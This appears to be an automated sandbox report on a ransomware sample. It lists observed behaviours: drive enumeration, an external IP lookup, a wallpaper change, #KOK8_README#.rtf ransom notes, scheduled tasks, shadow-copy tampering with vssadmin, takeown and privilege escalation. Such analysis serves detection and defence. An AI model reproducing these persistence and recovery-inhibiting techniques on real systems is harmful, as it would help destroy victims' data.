941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\MSUBLQZS\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\QBK2VD81\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TRGSE1EV\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\A: 6a9E8kW864.exe File opened (read-only) \??\Y: 6a9E8kW864.exe File opened (read-only) \??\V: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\S: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\R: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\Q: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\N: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\J: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\I: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\G: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\P: 6a9E8kW864.exe File opened (read-only) \??\Z: 6a9E8kW864.exe File opened (read-only) \??\G: 6a9E8kW864.exe File opened (read-only) \??\L: 6a9E8kW864.exe File opened (read-only) \??\N: 6a9E8kW864.exe File opened (read-only) \??\U: 6a9E8kW864.exe File opened (read-only) \??\W: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\E: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\E: 6a9E8kW864.exe File opened (read-only) \??\H: 6a9E8kW864.exe File opened (read-only) \??\I: 6a9E8kW864.exe File opened (read-only) \??\R: 6a9E8kW864.exe File opened (read-only) \??\T: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\P: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\M: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\O: 6a9E8kW864.exe File opened (read-only) \??\V: 6a9E8kW864.exe File opened (read-only) \??\W: 6a9E8kW864.exe File opened (read-only) \??\X: 6a9E8kW864.exe File opened (read-only) \??\Y: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\X: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\U: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\B: 6a9E8kW864.exe File opened (read-only) \??\K: 6a9E8kW864.exe File opened (read-only) \??\K: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\M: 6a9E8kW864.exe File opened (read-only) \??\Q: 6a9E8kW864.exe File opened (read-only) \??\T: 6a9E8kW864.exe File opened (read-only) \??\Z: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\L: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\H: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\J: 6a9E8kW864.exe File opened (read-only) \??\S: 6a9E8kW864.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\pq59Xef7.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\id.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\bin\java.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nassau 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Glace_Bay 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\London 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\Solitaire.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+3 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santa_Isabel 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Chagos 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Norfolk 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\MSBuild\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\bin\java-rmi.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\PYCC.pf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Macquarie 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Noumea 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Chess\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Ushuaia 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\uk.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Salta 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_ja.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-actions.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Colombo 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\COPYRIGHT 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bangkok 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\psfontj2d.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Minesweeper\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port_of_Spain 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterRegular.ttf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.password.template 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Google\Update\Install\{B262F552-36A4-4AFD-A8FD-D1AE5D349D55}\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4076 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1572 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1784 powershell.exe 3336 6a9E8kW864.exe 3336 6a9E8kW864.exe 3336 6a9E8kW864.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 3336 6a9E8kW864.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1784 powershell.exe Token: SeDebugPrivilege 3336 6a9E8kW864.exe Token: SeLoadDriverPrivilege 3336 6a9E8kW864.exe Token: SeTakeOwnershipPrivilege 3068 takeown.exe Token: SeTakeOwnershipPrivilege 888 takeown.exe Token: SeBackupPrivilege 3744 vssvc.exe Token: SeRestorePrivilege 3744 vssvc.exe Token: SeAuditPrivilege 3744 vssvc.exe Token: SeTakeOwnershipPrivilege 2944 takeown.exe Token: SeTakeOwnershipPrivilege 2980 takeown.exe Token: SeIncreaseQuotaPrivilege 2488 WMIC.exe Token: SeSecurityPrivilege 2488 WMIC.exe Token: SeTakeOwnershipPrivilege 2488 WMIC.exe Token: SeLoadDriverPrivilege 2488 WMIC.exe Token: SeSystemProfilePrivilege 2488 WMIC.exe Token: SeSystemtimePrivilege 2488 WMIC.exe Token: SeProfSingleProcessPrivilege 2488 WMIC.exe Token: SeIncBasePriorityPrivilege 2488 WMIC.exe Token: SeCreatePagefilePrivilege 2488 WMIC.exe Token: SeBackupPrivilege 2488 WMIC.exe Token: SeRestorePrivilege 2488 WMIC.exe Token: SeShutdownPrivilege 2488 WMIC.exe Token: SeDebugPrivilege 2488 WMIC.exe Token: SeSystemEnvironmentPrivilege 2488 WMIC.exe Token: SeRemoteShutdownPrivilege 2488 WMIC.exe Token: SeUndockPrivilege 2488 WMIC.exe Token: SeManageVolumePrivilege 2488 WMIC.exe Token: 33 2488 WMIC.exe Token: 34 2488 WMIC.exe Token: 35 2488 WMIC.exe Token: SeIncreaseQuotaPrivilege 2488 WMIC.exe Token: SeSecurityPrivilege 2488 WMIC.exe Token: SeTakeOwnershipPrivilege 2488 WMIC.exe Token: SeLoadDriverPrivilege 2488 WMIC.exe Token: SeSystemProfilePrivilege 2488 WMIC.exe Token: SeSystemtimePrivilege 2488 WMIC.exe Token: SeProfSingleProcessPrivilege 2488 WMIC.exe Token: SeIncBasePriorityPrivilege 2488 WMIC.exe Token: SeCreatePagefilePrivilege 2488 WMIC.exe Token: SeBackupPrivilege 2488 WMIC.exe Token: SeRestorePrivilege 2488 WMIC.exe Token: SeShutdownPrivilege 2488 WMIC.exe Token: SeDebugPrivilege 2488 WMIC.exe Token: SeSystemEnvironmentPrivilege 2488 WMIC.exe Token: SeRemoteShutdownPrivilege 2488 WMIC.exe Token: SeUndockPrivilege 2488 WMIC.exe Token: SeManageVolumePrivilege 2488 WMIC.exe Token: 33 2488 WMIC.exe Token: 34 2488 WMIC.exe Token: 35 2488 WMIC.exe Token: SeTakeOwnershipPrivilege 1048 takeown.exe Token: SeTakeOwnershipPrivilege 4048 takeown.exe Token: SeTakeOwnershipPrivilege 3728 takeown.exe Token: SeTakeOwnershipPrivilege 1688 takeown.exe Token: SeTakeOwnershipPrivilege 3568 takeown.exe Token: SeTakeOwnershipPrivilege 2740 takeown.exe Token: SeTakeOwnershipPrivilege 1032 takeown.exe Token: SeTakeOwnershipPrivilege 1068 takeown.exe Token: SeTakeOwnershipPrivilege 1836 takeown.exe Token: SeTakeOwnershipPrivilege 2452 takeown.exe Token: SeTakeOwnershipPrivilege 2364 takeown.exe Token: SeTakeOwnershipPrivilege 2412 takeown.exe Token: SeTakeOwnershipPrivilege 3528 takeown.exe Token: SeTakeOwnershipPrivilege 3432 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1732 wrote to memory of 2952 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 1732 wrote to memory of 2952 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 1732 wrote to memory of 2952 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 1732 wrote to memory of 2952 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 1732 wrote to memory of 2900 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 1732 wrote to memory of 2900 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 1732 wrote to memory of 2900 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 1732 wrote to memory of 2900 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 1732 wrote to memory of 2428 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 1732 wrote to memory of 2428 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 1732 wrote to memory of 2428 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 1732 wrote to memory of 2428 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 2428 wrote to memory of 1784 2428 cmd.exe 35 PID 2428 wrote to memory of 1784 2428 cmd.exe 35 PID 2428 wrote to memory of 1784 2428 cmd.exe 35 PID 2428 wrote to memory of 1784 2428 cmd.exe 35 PID 1732 wrote to memory of 2244 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 1732 wrote to memory of 2244 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 1732 wrote to memory of 2244 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 1732 wrote to memory of 2244 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 1732 wrote to memory of 2228 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 1732 wrote to memory of 2228 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 1732 wrote to memory of 2228 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 1732 wrote to memory of 2228 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 2244 wrote to memory of 2040 2244 cmd.exe 41 PID 2244 wrote to memory of 2040 2244 cmd.exe 41 PID 2244 wrote to memory of 2040 2244 cmd.exe 41 PID 2244 wrote to memory of 2040 2244 cmd.exe 41 PID 1732 wrote to memory of 2900 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 42 PID 1732 wrote to memory of 2900 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 42 PID 1732 wrote to memory of 2900 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 42 PID 1732 wrote to memory of 2900 1732 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 42 PID 2228 wrote to memory of 2620 2228 cmd.exe 40 PID 2228 wrote to memory of 2620 2228 cmd.exe 40 PID 2228 wrote to memory of 2620 2228 cmd.exe 40 PID 2228 wrote to memory of 2620 2228 cmd.exe 40 PID 2244 wrote to memory of 3036 2244 cmd.exe 44 PID 2244 wrote to memory of 3036 2244 cmd.exe 44 PID 2244 wrote to memory of 3036 2244 cmd.exe 44 PID 2244 wrote to memory of 3036 2244 cmd.exe 44 PID 2900 wrote to memory of 1284 2900 cmd.exe 45 PID 2900 wrote to memory of 1284 2900 cmd.exe 45 PID 2900 wrote to memory of 1284 2900 cmd.exe 45 PID 2900 wrote to memory of 1284 2900 cmd.exe 45 PID 2244 wrote to memory of 3132 2244 cmd.exe 47 PID 2244 wrote to memory of 3132 2244 cmd.exe 47 PID 2244 wrote to memory of 3132 2244 cmd.exe 47 PID 2244 wrote to memory of 3132 2244 cmd.exe 47 PID 2900 wrote to memory of 3136 2900 cmd.exe 48 PID 2900 wrote to memory of 3136 2900 cmd.exe 48 PID 2900 wrote to memory of 3136 2900 cmd.exe 48 PID 2900 wrote to memory of 3136 2900 cmd.exe 48 PID 2900 wrote to memory of 3868 2900 cmd.exe 49 PID 2900 wrote to memory of 3868 2900 cmd.exe 49 PID 2900 wrote to memory of 3868 2900 cmd.exe 49 PID 2900 wrote to memory of 3868 2900 cmd.exe 49 PID 